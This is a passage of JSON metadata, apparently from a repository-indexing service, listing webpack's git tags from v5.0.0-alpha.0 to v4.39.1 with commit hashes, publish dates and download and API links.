t":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0",